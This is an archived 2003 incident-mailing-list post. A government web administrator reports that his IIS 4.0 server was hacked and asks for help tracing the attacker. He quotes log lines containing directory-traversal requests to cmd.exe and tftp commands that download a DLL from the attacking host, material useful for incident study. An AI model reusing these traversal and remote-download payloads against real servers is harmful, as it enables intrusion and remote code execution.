Hacked web server

From: Rogelio Vidaurri Courcelle (rvidaurri@haciendachiapas.gob.mx)
Date: 01/10/03

  • Next message: Nick FitzGerald: "RE: Virus? Trojan?" 
    From: "Rogelio Vidaurri Courcelle" <rvidaurri@haciendachiapas.gob.mx>
To: <incidents@securityfocus.com>
Date: Fri, 10 Jan 2003 14:39:59 -0600

    Hi... my web server (NT 4.0 SP6a) was hacked last friday, it has only
    one NIC with a public IP
    we have an OpenBSD Firewall (PF) that filters both incoming and
    outcoming traffic.... this firewall has no ip addresses.....
    external users have access to our web server only by port 80...
    we had a popup window in our default page.... i dont know if that's why
    he could hack our server.... i'm not an expert in these.. i'm a
    begineer.....
    (my english is not perfect sorry for the inconviniences)...
    anyway.. we deleted that popup window and haven't been hacked again...
    we try to patch our server but the patch "destroyed" my IIS 4.0 and we
    had to reinstall everything....
    in my LOGFILES i have te records of our visits.... and since 2 months
    ago it's been registering this:
     
    200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0,
    72, 275, 403, 5, GET, /scripts/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0,
    70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
    125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
    /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,
    125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
    /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
    125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
    /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221,
    125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe,
    /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
    200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0,
    79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
    145, 261, 500, 123, GET,
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    , /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
    97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221,
    16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
    97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir,
    200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,
    97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir,

    i have read that it could be because of Nimda but i have scanned with
    the latest pattern and it found no viruses... only a backdoor trojan
    called ncx99.exe dropped in mailroot\drop\temp
    by the way, can i delete files inside that folder??? there's a
    rundlls32.exe... a KEY file, etcetera......
     
    what can it be? i need help...
    how could i trace the hacker??
    thanks in advance.....
     
     
     
    ISC. Rogelio Vidaurri Courcelle
    Área de Sistemas y Web
    Secretaría de Hacienda

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com

    Relevant Pages

    • Re: MS02-018 Breaking ASP ODBC
      ... > after installing the latest security hotfixes as of April ... >>1) IIS 5 web server can't be contacted. ... >>before the patch and that fixed that problem. ... >>load some VB components that fail to connect to my Oracle ...
      (microsoft.public.inetserver.iis.security)
    • Re: IE6 form POST operation sporadic after sp KB832894 install
      ... We have configured our Apache 1.3.x web server to turn ... # The following directives modify normal HTTP response ... after I installed the latest IE patch and I cannot seem to ... I believe that his workaround fixes the problem for us. ...
      (microsoft.public.windows.inetexplorer.ie6.browser)
    • MS02-018 Breaking ASP ODBC
      ... IIS 5 web server can't be contacted. ... But now my asp pages can no longer connect to the Oracle Database, ... Uninstalling the patch did not help. ... want to install the patch since we try the keep up to date with all of the ...
      (microsoft.public.inetserver.iis.security)
    • RE: Companyweb
      ... i disabled port 80,for security reasons and also since server is not acting ... as a web server. ... external users now connect via HTTPS ... this asks them to log in before being allowed access to internal website ...
      (microsoft.public.windows.server.sbs)
    • Re: Danger alert! New internet security problem
      ... I would suggest people not use their credit card or other financial ... information on web sites until they have a patch for this in their ... You can see what operating system and web server a site is running at ...
      (sci.med.transcription)